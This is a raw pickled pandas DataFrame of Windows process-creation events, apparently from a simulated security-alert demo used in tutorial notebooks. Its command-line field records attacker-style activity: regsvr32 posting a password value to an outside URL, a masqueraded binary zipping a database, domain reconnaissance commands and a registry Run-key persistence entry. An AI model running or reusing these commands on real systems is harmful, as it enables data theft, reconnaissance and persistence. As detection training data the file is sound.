tutorials-and-examples/example-notebooks/data/process_tree.pkl (31 lines of code) (raw):

��� �pandas.core.frame�� DataFrame���)��}�(�_data��pandas.core.internals.managers�� BlockManager���)��(]�(�pandas.core.indexes.base�� _new_Index���h �Index���}�(�data��numpy.core.multiarray�� _reconstruct����numpy��ndarray���K��Cb���R�(KK��h�dtype����O8�KK��R�(K�|�NNNJ����J����K?t�b�]�(�TenantId��Account��EventID�� TimeGenerated��Computer��SubjectUserSid��SubjectUserName��SubjectDomainName��SubjectLogonId�� NewProcessId��NewProcessName��TokenElevationType�� ProcessId�� CommandLine��ParentProcessName�� TargetLogonId��SourceComputerId��TimeCreatedUtc��NodeRole��Level�� ProcessId1�� NewProcessId1�et�b�name�Nu��R�h �pandas.core.indexes.range�� RangeIndex���}�(h<N�start�K�stop�K�step�Ku��R�e]�(hhK��h��R�(KKK��h�M8�KK��R�(K�<�NNNJ����J����K}�(Cns�KKKt���t�b�B��� �8�@����8�@����8�@����8�@����8��p���8����8����8�@x��8��2w�8��_��8��jk&�8���b(�8�@�,*�8���'-�8���X.�8��c���8���� �8�@����8�@����8�@����8�@����8��p���8����8����8�@x��8��2w�8��_��8��jk&�8���b(�8�@�,*�8���'-�8���X.�8��c���8��t�bhhK��h��R�(KKK��h�i8�KK��R�(KhPNNNJ����J����Kt�b�BPPPPPPPPPPPPPPPPP�t�bhhK��h��R�(KKK��h!�]�(�$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��WORKGROUP\MSTICAlertsWin1$��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��S-1-5-18�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin�� MSTICAdmin��MSTICAlertsWin1$��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1�� WORKGROUP��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x3e7��0x1150��0x6dc��0x114c��0xfa4��0x1164��0x12b0��0xdd4��0xc34��0xc64��0x6e8��0xd98��0xfe4��0x2f0��0x18c��0x13a0��0x10dc��0x12f4�� C:\W!ndows\System32\regsvr32.exe��C:\Windows\System32\conhost.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe�� C:\W!ndows\System32\rundll32.exe�� C:\Windows\System32\tasklist.exe��C:\Windows\System32\net.exe��C:\Windows\System32\whoami.exe�� C:\Windows\System32\HOSTNAME.EXE��C:\Windows\System32\NETSTAT.EXE��C:\Windows\System32\net.exe��C:\Windows\System32\net.exe��C:\Windows\System32\net.exe��C:\W!ndows\System32\reg.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x498��\.\regsvr32 /u /s c:\windows\fonts\csrss.exe "http://www.401k.com/upload?pass=34592389" post��7\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1��&cmd /c echo Begin Security Demo tasks��Vcmd /c echo Any questions about the commands executed here then please contact one of��Mcmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com��?.\rundll32.exe /C c:\windows\fonts\conhost.exe zip archive.mdb��tasklist��net localgroup Administrators��whoami��hostname�� netstat -an��net user Bob1 /domain��net user BobX /domain��"net group "Domain Admins" /domain��A.\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue��$cmd /c echo End Security Demo tasks��Ecmd.exe /c c:\Diagnostics\WinSimulateAlerts.cmd c:\W!ndows\System32 3��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\svchost.exe��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x78225e��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��source��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��parent���jwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwet�be]�(h h}�(hhhK��h��R�(KK��h!�]�(h(h6et�bh<Nu��R�h h}�(hhhK��h��R�(KK��h!�]�(h'h8et�bh<Nu��R�h h}�(hhhK��h��R�(KK��h!�]�(h%h&h)h*h+h,h-h.h/h0h1h2h3h4h5h7h9h:et�bh<Nu��R�e}��0.14.1�}�(�axes�h �blocks�]�(}�(�values�hK�mgr_locs��builtins��slice���KKK��R�u}�(j�hZj�j�KK$K��R�u}�(j�hdj�hhK��h��R�(KK��h^�C� �t�bueust�b�_typ�� dataframe�� _metadata�]�ub.